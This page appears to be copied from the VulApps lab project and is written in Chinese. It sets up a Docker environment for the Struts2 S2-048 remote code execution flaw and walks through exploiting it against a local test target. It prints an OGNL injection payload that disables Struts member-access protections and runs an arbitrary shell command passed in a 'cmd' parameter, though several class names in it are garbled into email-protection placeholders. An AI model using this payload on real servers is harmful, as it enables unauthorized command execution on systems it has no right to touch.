Struts2-struts1-plugin 插件远程代码执行漏洞(S2-048) 环境

漏洞信息

获取环境:

  1. 拉取镜像到本地

    $ docker pull medicean/vulapps:s_struts2_s2-048
  2. 启动环境

    $ docker run -d -p 80:8080 medicean/vulapps:s_struts2_s2-048

    -p 80:8080 前面的 80 代表物理机的端口,可随意指定。

使用与利用

访问 http://你的 IP 地址:端口号/

PoC

例如目标地址为:http://127.0.0.1:32768/

  1. 访问本例目标地址

http://127.0.0.1:32768/integration/editGangster.action

  1. 如下图在Gangster Name字段输入 Payload

3.提交后可看到表达式被执行

EXP

核心部分如下:

%{(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=#parameters.cmd[0]).(#iswin=(@[email protected]('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@[email protected](#process.getInputStream(),#ros)).(#ros.flush())}

需要再指定一个 cmd 参数,传入要执行的命令:

参考链接

Copied From: Medicean/VulApps/s/struts2/s2-048